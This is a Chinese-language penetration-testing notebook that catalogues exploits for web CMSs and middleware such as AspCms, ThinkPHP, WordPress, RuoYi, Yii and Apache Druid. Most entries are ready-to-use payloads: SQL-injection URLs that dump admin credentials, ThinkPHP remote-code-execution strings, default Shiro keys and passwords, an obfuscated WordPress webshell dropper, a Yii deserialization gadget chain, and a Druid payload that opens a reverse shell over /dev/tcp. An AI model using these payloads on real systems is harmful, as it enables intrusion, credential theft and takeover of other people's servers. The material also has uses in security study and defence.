学习笔记-B/S - Exploits

B/S - Exploits


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


大纲


各类论坛/CMS框架

什么是 CMS

内容管理系统 (CMS) 是一种存储所有数据 (如文本,照片,音乐,文档等) 并在你的网站上提供的软件. 它有助于编辑,发布和修改网站的内容.

工具包

74CMS

骑士 CMS 6.0.48以下文件包含getshell


AEN

相关工具


aspcms

fofa: Powered by AspCms2

AspCms1.5 版以下注入漏洞

  • POC | Payload | exp
    # 爆用户名 EXP
    http://www.***.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
    
    这是爆 ID=1 的账户名,如果发现权限不够可以往后试 2,3,4………..
    
    # 爆密码
    http://www.xxx.com/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
    
    后台登录地址:/admin/login.asp
    
    后台拿 shell
    
    1. 直接上传`.asp;x`
    2. 系统配置信息
    3. 模版管理新建 `1.asp` 模板,内容写马的内容.
    

AspCms2.1.4 GBK 版,未验证权限、且存在注入漏洞

  • POC | Payload | exp
    admin/_content/_About/AspCms_AboutEdit.asp
    
    http://www.xxx.com/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1
    

AspCms2.0未验证权限,且存在注入漏洞

  • POC | Payload | exp

    admin/_content/_About/AspCms_AboutEdit.asp?id=19
    
    • 表名:aspcms_user
    • 列名:loginname、password
    http://www.xxx.com/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1
    

Cookies 欺骗

  • POC | Payload | exp
    cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
    

进入后台后GetShell

  • POC | Payload | exp
    所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了
    http://www.xxx.com/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp
    
    插入asp;x文件蚁剑连接即可。

dedeCMS

官网 : http://www.dedecms.com/

相关工具

相关文章

5.8.1 rce

SRC-2021-0029 : Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability


Discuz

Discuz

官网 : https://www.discuz.net/forum.php
https://gitee.com/Discuz/DiscuzX

相关文章

CVE-2018-14729

DiscuzX 3.4 SSRF

Discuz!ML

官网 : https://discuz.ml/

discuzml-v-3-x-code-injection-vulnerability

CVE-2019-13956


Drupal

官网 : https://www.drupal.org/

Tips

对'/node/$'进行Fuzz,其中'$'是一个数字(从1到500)。⽐如说:"/node/$"。

CVE-2014-3704 “Drupalgeddon” SQL 注入漏洞

CVE-2017-6920 Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞

CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞

CVE-2018-7602 远程代码执行漏洞

CVE-2019-6339 远程代码执行漏洞

CVE-2019-6341 XSS

CVE-2020-28948


ECshop

官网 : http://www.ecshop.com/

ECShop 是一款 B2C 独立网店系统,适合企业及个人快速构建个性化网上商店.系统是基于 PHP 语言及 MYSQL 数据库构架开发的跨平台开源程序.

ECShop 2.x/3.x SQL 注入/任意代码执行漏洞

ecshop后台getshell


Fastadmin

项目: https://github.com/karsonzhang/fastadmin

FastAdmin 是一款基于 ThinkPHP5+Bootstrap 开发的极速后台开发框架。FastAdmin 基于 Apache2.0 开源协议发布,目前被广泛应用于各大行业应用后台管理。

Fastadmin 前台 Getshell


Laravel

Fofa: app="Laravel-Framework"

相关文章

env 泄露

  • POC | Payload | exp
    /.env
    

日志泄露

  • POC | Payload | exp
    /storage/logs/laravel.log
    

Debug模式

  • POC | Payload | exp
    /logout
    /param[]=0
    

Laravel PHPUnit Remote Code Execution

  • 影响版本

    • Before 4.8.28 and 5.x before 5.6.3
  • POC | Payload | exp

    curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    

CVE-2021-3129 Laravel Debug 页面 RCE

Laravel 8.x image upload bypass


jeecg

fofa: app="JEECG"

相关文章

密码重置

  • POC | Payload | exp
    • 当访问loginController.do?goPwdInit 或 pwdInit时,即使用户已经修改过密码,admin的密码仍会被重置为123456。

sessionid 信息泄露

  • POC | Payload | exp
    http://localhost:8080/webpage/system/druid/websession.json
    

文件上传

  • POC | Payload | exp
    /jeecgFormDemoController.do?commonUpload
    

jeewms

Fofa: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" && body="仓"

未授权任意文件读取漏洞

  • POC | Payload | exp
    http://x.x.x.x:8088/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
    http://x.x.x.x:8020/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
    

Joomla

官网 : https://www.joomla.org/

相关工具

CVE-2017-8917 Joomla! 3.7 Core SQL 注入

  • 描述

    Joomla 于5月17日发布了新版本 3.7.1,本次更新中修复一个高危 SQL 注入漏洞,成功利用该漏洞后攻击者可以在未授权的情况下进行 SQL 注入。

  • 影响版本

    • joomla 3.7.0
  • 相关文章

  • POC | Payload | exp

    http://你的 IP 地址:端口号/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
    

    sqlmap payload

    sqlmap -u "http://192.168.1.1/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump
    

CVE-2021-23132


Maccms

Maccms v10后门


MetInfo

官网: https://www.metinfo.cn/

相关文章

CVE-2018-13024

  • 描述

    远程攻击者可通过向 admin/column/save.php 文件发送 module 参数利用该漏洞向 .php 文件写入代码并执行该代码.

  • 影响版本

    • MetInfo 5.3.16
    • MetInfo 6.0.0
  • 相关文章

  • POC | Payload | exp

    • admin/column/save.php?name=123&action=editor&foldername=upload&module=22;@eval($_POST[1]);/*

October

官网: http://octobercms.com

October CMS 1.0.412 - Multiple Vulnerabilities


pBootCMS

pBootCMS 3.0.4 前台注入


php7cms

文件包含漏洞


PHPMyWind

相关文章

PHPMyWind 5.3 - Cross-Site Scripting


RuoYi

Fofa: app="若依-管理系统"

默认口令

admin/admin123

后台任意文件读

  • 影响版本

    • RuoYi <= v4.5.0
  • POC | Payload | exp

    /common/download/resource?resource=/profile/../../../../etc/passwd
    

druid 未授权访问

  • POC | Payload | exp
    /prod-api/druid/index.html
    

默认shiro key

fCq+/xW488hMTCD+cmJ3aQ==
zSyK5Kp6PZAAjlT+eeNMlg==

4.6.1 后台注入

  • 相关文章

  • POC | Payload | exp

    POST /ruoyi/system/user/list HTTP/1.1
    POST /ruoyi/system/user/export HTTP/1.1
    POST /ruoyi/system/Allocated/list HTTP/1.1
    POST /ruoyi/system/role/list HTTP/1.1
    POST /ruoyi/system/dept/list HTTP/1.1
    
    params[dataScope]=a
    

4.6.2 后台RCE


SeaCMS

Fofa: app="海洋CMS"

CVE-2020-21378 后台SQL注入漏洞

  • 描述

    攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。

  • POC | Payload | exp

    /admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
    

ShopXO

CNVD-2021-15822 任意文件读取漏洞


Sitecore

fofa : "Sitecore Experience Platform"

Sitecore rce


SiteServer

相关文章

找回密码

管理员的 “密码找回问题答案” 为非强制项,一般都留空。此时如果在密码找回页面,输入空密码找回答案,就可以获得当前管理员的密码明文(页面有做 javascript 限制答案长度不能为 0,但禁用 javascript 即可绕过)

访问 /siteserver/forgetPassword.aspx, 然后禁止 Javascript。输入用户名,获取密码

6.8.3 验证码绕过 & 后台多处注入

  • 相关文章

  • POC | Payload | exp

    POST /api/v1/administrators/actions/login HTTP/1.1
    {"account":"admin","password":"7fef6171469e80d32c0559f88b377245","isAutoLogin":true}
    
    GET /SiteServer/settings/pageAdministrator.aspx?areaId=0&departmentId=0&keyword=1&lastActivityDate=3&order=1%2C(select%20case%20when%20(3*2*1=6%20AND%2000043=00043)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)=1&pageNum=50&roleName= HTTP/1.1
    
    GET /SiteServer/settings/pageUser.aspx?creationDate=0&groupId=-1&keyword=&lastActivityDate=0&loginCount=0&pageNum=0&searchType=if(now()=sysdate()%2Csleep(0)%2C0) HTTP/1.1
    

SiteServer CMS 远程模板下载 Getshell 漏洞


ThinkAdmin

项目地址 : https://github.com/zoujingli/ThinkAdmin

ThinkAdminV6 任意文件操作 CVE-2020-25540

  • 相关文章

  • POC | Payload | exp

    1、目录遍历注意 POST 数据包 rules 参数值需要 URL 编码
    POST /admin.html?s=admin/api.Update/node
    rules=%5B%22.%2F%22%5D
    
    2、文件读取,后面那一串是 UTF8 字符串加密后的结果。计算方式在 Update.php 中的加密函数。
    /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
    

ThinkCMF

官网: https://www.thinkcmf.com/

Fofa: title="ThinkCMF"

ThinkCMF 任意内容包含漏洞


ThinkPHP

官网: http://www.thinkphp.cn/

<5

相关文章

日志泄露

/Application/Runtime/Logs/Home/16_09_06.log # 其中 Application 可能会变,比如 App
/Runtime/Logs/Home/16_09_06.log             # 年份_月份_日期
/Runtime/Logs/User/16_09_06.log             # 年份_月份_日期

5

相关文章

相关工具

  • Lucifer1993/TPscan - 一键 ThinkPHP 漏洞检测
  • theLSA/tp5-getshell - thinkphp5 rce 漏洞检测工具
  • sukabuliet/ThinkphpRCE - Thinkphp rce 扫描脚本,附带日志扫描
  • tangxiaofeng7/TPScan
  • bewhale/thinkphp_gui_tools - ThinkPHP 漏洞 综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含, 宝塔绕过
    java -Dfile.encoding="UTF-8" --module-path "C:\Program Files\Java\javafx-sdk-11.0.2\lib" --add-modules "javafx.controls,javafx.fxml,javafx.web" -jar "xxx.jar"
    

资源

日志泄露

/runtime/log/202004/1.log       # 年月/数字

thinkphp 5

/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

thinkphp 5.0.10(完整版)

(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

thinkphp 5.0.21

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.0.22

/?s=.|think\config/get&name=database.username
/?s=.|think\config/get&name=database.password
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.0.23(完整版)

(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thinkphp 5.0.23(完整版)debug模式

(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.1.*

/?s=index/\think\Request/input&filter=phpinfo&data=1
/?s=index/\think\Request/input&filter=system&data=cmd
/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

thinkphp 5.2.*

(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

未知版本未知版本

?s=index/\think\module/action/param1/${@phpinfo()}
?s=index/\think\Module/Action/Param/${@phpinfo()}
?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
index.php?s=/home/article/view_recent/name/1'

header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"

index.php?s=/home/shopcart/getPricetotal/tag/1%27
index.php?s=/home/shopcart/getpriceNum/id/1%27
index.php?s=/home/user/cut/id/1%27
index.php?s=/home/service/index/id/1%27
index.php?s=/home/pay/chongzhi/orderid/1%27
index.php?s=/home/pay/index/orderid/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/detail/id/1%27
index.php?s=/home/order/cancel/id/1%27
index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+

POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#

debug 信息泄露

>5

thinkphp6 session 任意文件创建漏洞


TPshop

目录遍历漏洞


UCMS

CVE-2020-25483 后台文件上传漏洞

vBulletin

vBulletin 5.6.1 SQL 注入

http://localhost/vb5/ajax/api/content_attach/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=SQLi

获取管理员用户:

http://SITE/vb5/ajax/api/content_infraction/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,username,8,7,6,5,4,3,2,1+from+user+where+userid=1--

获取admin token:

http://SITE/vb5/ajax/api/content_infraction/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,token,8,7,6,5,4,3,2,1+from+user+where+userid=1--

Weiphp

CNVD-2020-68596 前台文件任意读取

CNVD-2021-09693 Weiphp5.0 任意用户Cookie伪造


WordPress

官网 : https://wordpress.org/

WordPress 是一个开源的内容管理系统(CMS),允许用户构建动态网站和博客.

搭建教程

Tips

  • 默认的登录地址一般是 /wp-admin/wp-login.php

相关工具

  • wpscanteam/wpscan - kali 自带,漏洞扫描需要 API Token,可扫用户、漏洞、目录,挺好用的
    wpscan --url https://www.xxxxx.com/     # 直接扫描
    wpscan --url https://www.xxxxx.com/ --enumerate u    # 枚举用户
    wpscan --url https://www.xxxxx.com/ --passwords /tmp/password.txt   # 密码爆破
    wpscan --url https://www.xxxxx.com/ --usernames admin --passwords out.txt  # 指定用户爆破
    wpscan --url https://www.xxxxx.com/ --api-token xxxxxxxxCX8TTkkgt2oIY   # 使用 API Token,扫描漏洞
    wpscan --url https://www.xxxxx.com/ -e vp --api-token xxxxxxx    # 扫描插件漏洞
    wpscan --url https://www.xxxxx.com/ -e vt --api-token xxxxxxx    # 扫描主题漏洞
    

xmlrpc.php

  • xmlrpc.php 漏洞利用

  • 查看系统允许的方法

    POST /wordpress/xmlrpc.php HTTP/1.1
    Host: www.example.com
    Content-Length: 99
    
    <methodCall>
    <methodName>system.listMethods</methodName>
    <params></params>
    </methodCall>
    
  • 账号爆破

    一般情况下,wordpress 的管理后台都会设置账号登录失败次数限制,因此,可以通过 xmlprc.php 接口来进行爆破。通常会使用 wp.getUserBlogs、wp.getCategories 和 metaWeblog.getUsersBlogs 这个方法来进行爆破,也可以使用其他的方法。

    POST /wordpress/xmlrpc.php HTTP/1.1
    Host: www.example.com
    Content-Length: 99
    
    <methodCall>
    <methodName>wp.getUsersBlogs</methodName>
    <params>
    <param><value>admin</value></param>
    <param><value>password</value></param>
    </params>
    </methodCall>
    
  • SSRF

    WordPress 版本 ❤️.5.1, 通过 Pingback 可以实现的服务器端请求伪造 (Server-side request forgery,SSRF) 和远程端口扫描。

    POST /wordpress/xmlrpc.php HTTP/1.1
    Host: www.example.com
    Content-Length: 99
    
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params><param>
    <value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
    </param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
    </value></param></params>
    </methodCall>
    

WordPress 后台拿 SHELL

  • 后台编辑404页面Getshell

    "主题"-“编辑”-“404.php”

    <script language="php">fputs(fopen(chr(46).chr(47).chr(99).chr(111).chr(110).chr(103).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(112).chr(97).chr(115).chr(115).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
    

    插到文件头,404默认模板路径是:wp-content/themes/twentyten/404.php,其中"twentyten"目录是默认模板目录。更新完直接访问 localhost/wp-content/themes/twentyten/404.php 就会在twentyten目录生成一句话后门文件cong.php 密码pass,插入的代码是Chr加密,可自行编辑。(仔细看代码,文件名与一句话代码用" ,w "隔开了)

  • 上传本地主题Getshell

    本机建立目录“test”,可以直接把一句话放到index.php文件,再新建一个style.css样式文件(版本不同,上传时会判断是否存在"index.php"文件和"style.css"样式文件。)

    打包test目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为: localhost/wp-content/themes/test/index.php

CVE-2019-8942 & CVE-2019-8943 WordPress Crop-image Shell Upload

  • 描述

    此模块利用 WordPress 版本5.0.0和<= 4.9.8上的路径遍历和本地文件包含漏洞。 裁剪图像功能允许用户(至少具有作者权限)通过在上载期间更改 _wp_attached_file 引用来调整图像大小并执行路径遍历。 利用的第二部分将通过在创建帖子时更改 _wp_page_template 属性,将该图像包含在当前主题中。 目前,此漏洞利用模块仅适用于基于 Unix 的系统。

  • 影响版本

    • wordpress < 4.9.9
    • wordpress 5.0 ~ 5.0:rc3
  • POC | Payload | exp

  • MSF Module

    use exploit/multi/http/wp_crop_rce
    

WordPress <= 5.3.? DoS

CVE-2022-21661 WP_Query SQLinj

CVE-2022-21662 WordPress 5.8.2 Stored XSS Vulnerability

插件漏洞


XYHCMS

官网 : http://www.xyhcms.com/
fofa: app="XYHCMS"
fofa: icon_hash="-1300821702"

相关文章

后台路径

/xyhai.php

后台任意文件读取

  • POC | Payload | exp
    http://127.0.0.1/xyhai.php?s=/Templets/edit/fname/Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA==
    

CNVD-2020-03899 后台文件写入导致代码执行漏洞

  • POC | Payload | exp
    后台,系统设置->网站设置->会员配置->禁止使用的名称
    <?eval($_POST['cmd'])?>
    http://localhost/App/Runtime/Data/config/site.php
    

后台文件写入导致代码执行漏洞2

  • POC | Payload | exp
    后台,系统设置->网站设置,任意设置,在输入框内填 <?php phpinfo()?>
    http://localhost/App/Runtime/Data/config/site.php
    

windows 版本文件上传漏洞

  • POC | Payload | exp
    后台,系统设置->网站设置->上传配置->允许附件类型,添加类型 shell.php::$DATA
    点击下面的 水印图片上传,之后会在图片部分显示上传路径,在windows下面,会自动忽略后面的::$DATA。
    

任意文件删除漏洞

  • POC | Payload | exp
    http://domain/xyhai.php?s=/Database/delSqlFiles/sqlfilename/..\\..\\..\\install/install.lock
    
    POST /xyhai.php?s=/Database/delSqlFiles/batchFlag/1
    
    key[]=../../../install/install.lock
    
    访问 http://domain/install 可以重装cms
    

后台任意文件下载

  • POC | Payload | exp
    http://domain/xyhai.php?s=/Database/downFile/file/..\\..\\..\\App\\Common\\Conf\\db.php/type/zip
    

CNVD-2021-05552 反序列化

3.6 后台模版编辑rce


Yii

官网 : https://www.yiichina.com/

Yii2 是一个高性能,基于组件的开源 PHP 框架,用于快速开发现代 Web 应用程序。

CVE-2020-15148 Yii 框架反序列化 RCE

  • 描述

    Yii Framework 2 在其 9月14 日发布的更新日志中公布了一个反序列化远程命令执行漏洞(CVE-2020-15148)。官方通过给yii\db\BatchQueryResult类加上__wakeup()函数,禁用了yii\db\BatchQueryResult的反序列化,阻止了应用程序对任意用户输入调用’unserialize()’造成的远程命令执行。

  • 影响版本

    • Yii2 Version < 2.0.38
  • 相关文章

  • POC | Payload | exp

    <?php
    namespace yii\rest{
        class CreateAction{
            public $checkAccess;
            public $id;
    
            public function __construct(){
                $this->checkAccess = 'system';
                $this->id = 'ls -al';
            }
        }
    }
    
    namespace Faker{
        use yii\rest\CreateAction;
    
        class Generator{
            protected $formatters;
    
            public function __construct(){
                $this->formatters['close'] = [new CreateAction, 'run'];
            }
        }
    }
    namespace yii\db{
        use Faker\Generator;
    
        class BatchQueryResult{
            private $_dataReader;
    
            public function __construct(){
                $this->_dataReader = new Generator;
            }
        }
    }
    namespace{
        echo base64_encode(serialize(new yii\db\BatchQueryResult));
    }
    ?>
    

YxCMS

官网 : http://www.yxcms.net

常见路径

/index.php?r=admin  # 后台  默认管理员账号密码 admin 123456

YxCMS 1.4.7 多个漏洞


zcncms

相关文章


Zend

Fofa: app="ZF-Zend-Framework"

config 文件泄露

  • POC | Payload | exp
    //application/configs/application.ini
    

五指cms

任意⽂件删除漏洞


框架引擎中间件

相关文章

工具包

ActiveMQ

官网 : https://activemq.apache.org/

Fofa: Apache ActiveMQ

Apache ActiveMQ 是美国阿帕奇 (Apache) 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等.

相关文章

搭建教程

默认密码

admin   admin

CVE-2015-1830 Apache ActiveMQ 5.11.1 Directory Traversal / Shell Upload

  • MSF Module
    use exploit/windows/http/apache_activemq_traversal_upload
    

CVE-2015-5254 ActiveMQ 反序列化漏洞

  • 描述

    Apache ActiveMQ 5.13.0 之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类.远程攻击者可借助特制的序列化的 Java Message Service(JMS)ObjectMessage 对象利用该漏洞执行任意代码.

  • 影响版本

    • Apache ActiveMQ 5.0.0 ~ 5.12.1
  • 相关文章

CVE-2016-3088 ActiveMQ 任意文件写入漏洞

  • 描述

    ActiveMQ 的 web 控制台分三个应用,admin、api 和 fileserver,其中 admin 是管理员页面,api 是接口,fileserver 是储存文件的接口;admin 和 api 都需要登录后才能使用,fileserver 无需登录.

    fileserver 是一个 RESTful API 接口,我们可以通过 GET、PUT、DELETE 等 HTTP 请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

    • 其使用率并不高
    • 文件操作容易出现漏洞

    所以,ActiveMQ 在 5.12.x~5.13.x 版本中,已经默认关闭了 fileserver 这个应用 (你可以在 conf/jetty.xml 中开启之) ;在 5.14.0 版本以后,彻底删除了 fileserver 应用.

  • 影响版本

    • Apache ActiveMQ < 5.12.x
  • 相关文章

CVE-2017-15709

  • 描述

    Apache ActiveMQ 默认消息队列 61616 端口对外,61616 端口使用了 OpenWire 协议,这个端口会暴露服务器相关信息,这些相关信息实际上是 debug 信息。会返回应用名称,JVM,操作系统以及内核版本等信息。

  • 影响版本

    • 5.14.0 < Apache ActiveMQ < 5.14.5
    • 5.15.0 < Apache ActiveMQ < 5.15.2
  • POC | Payload | exp

    telnet ip 61616
    

Axis

官网 : http://axis.apache.org/

Axis 是一个开源的基于 XML 的 Web 服务架构。它包含了 Java 和 C++ 语言实现的 SOAP 服务器,以及各种公用服务及 API 以生成和部署 Web 服务应用。

相关文章

Axis-1.4-RCE

Axis2默认弱口令


CAS

项目地址 : https://github.com/apereo/cas

Apereo CAS 4.X 反序列化漏洞


Cocoon

官网 : https://cocoon.apache.org/

CVE-2020-11991 XML 注入

  • 描述

    程序使用了 StreamGenerator 这个方法时,解析从外部请求的 xml 数据包未做相关的限制,恶意用户就可以构造任意的 xml 表达式,使服务器解析达到 XML 注入的安全问题。

  • POC | Payload | exp

    POST /v2/api/product/manger/getInfo
    
    <!--?xml version="1.0" ?-->
    <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
    <userInfo>
    <firstName>John</firstName>
    <lastName>&ent;</lastName>
    </userInfo>
    

ColdFusion

CVE-2017-3066 反序列化漏洞


Druid

Alibaba_Druid

未授权访问

Apache_Druid

官网 : https://druid.apache.org/

Fofa : title="Apache"&&title="Druid"

Apache Druid 是用 Java 编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

CVE-2021-25646

  • 描述

    Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。

  • 影响版本

    • Apache Druid < 0.20.1
  • 相关文章

  • POC | Payload | exp

    POST /druid/indexer/v1/sampler HTTP/1.1
    Host: xxxxx
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-Type: application/json
    Content-Length: 1044
    Connection: close
    
    {"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xxx/xxx 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
    

CVE-2021-26919

CVE-2021-36749

  • POC | Payload | exp
    curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
    

Dubbo

官网 : https://dubbo.apache.org/zh-cn/

fofa: app="APACHE-dubbo"

Apache Dubbo 是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。

相关工具

  • threedr3am/dubbo-exp - Dubbo 反序列化一键快速攻击测试工具,支持 dubbo 协议和 http 协议,支持 hessian 反序列化和 java 原生反序列化。

CVE-2019-17564 pache Dubbo 反序列化漏洞

CVE-2021-30179 Apache Dubbo RCE

CVE-2021-43297


ElasticSearch

官网 : https://www.elastic.co/

shodan : port:9200 json

ElasticSearch 是一个基于 Lucene 的搜索服务器.它提供了一个分布式多用户能力的全文搜索引擎,基于 RESTful web 接口.Elasticsearch 是用 Java 开发的,并作为 Apache 许可条款下的开放源码发布,是当前流行的企业级搜索引擎.

未授权访问漏洞

  • http://[ip]:9200
  • http://[ip]:9200/_plugin/head/ web 管理界面
  • http://[ip]:9200/hello/_search?pretty&size=50&from=50
  • http://[ip]:9200/_cat/indices
  • http://[ip]:9200/_river/_search 查看数据库敏感信息
